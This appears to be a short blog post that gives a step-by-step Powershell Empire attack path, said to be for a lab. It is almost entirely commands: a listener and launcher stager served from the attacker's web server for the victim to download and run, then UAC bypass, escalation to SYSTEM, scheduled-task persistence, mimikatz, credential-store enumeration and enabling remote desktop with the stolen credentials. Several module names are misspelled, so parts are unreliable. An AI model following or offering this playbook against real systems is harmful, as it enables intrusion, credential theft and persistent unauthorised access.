Powershell Empire common path in a lab test environment
./empire
1.) setup a listener
listeners
userlistener http
execute
2.) create a stager
userstager multi/launcher
set Listener http
set OutFile /launcher.ps1
3.) setup web server to server malicious launcher
python -m SimpleHTTPServer 8000
4.) infect victim
have victim pc execute reach to attacker pc, download launcher.ps1, execute
5.) interact with agent
**you should see agent check-in as soon as step #4 above is complete
interact XXXXX
rename victim
6.) see where you are
sysinfo
whoami
pwd
info (if HighIntegrity = 0 then regular user, if = 1 then admin)
7.) if not admin, find weaknesses
usemodule privesc/powerup/allchecks
execute
8.) if not admin, use a weakness (perhaps already admin just need uac bypass) to escalate to admin
usermodule privesc/bypassuac_env
set Listener http
execute
9.) interact with admin agent
** if it works, you should get new agent check-in immediately after step #8 that is admin**
interact XXXX
rename victimAsAdmin
10.) see where you are
whoami
info (if HighIntegrity = 0 then regular user, if = 1 then admin)
11.) if admin, move to SYSTEM
usemodule privesc/getssystem
execute
12.) see where you are
whoami (should says SYSTEM now)
13.) setup persistence as a scheduled task
usemodule persistence/userland/schtasks
set Listener http
set IdleTime 2
execute
14.) run mimikatz
mimikatz
15.) enumerate credential store
usemodule credentials/enum_cred_store
execute
16.) enable remote desktop
usermodule management/enable_rdp
execute
17.) remote desktop into the victim with credentials found
Showing posts with label powerup. Show all posts
Showing posts with label powerup. Show all posts
Friday, February 14, 2020
Subscribe to:
Posts (Atom)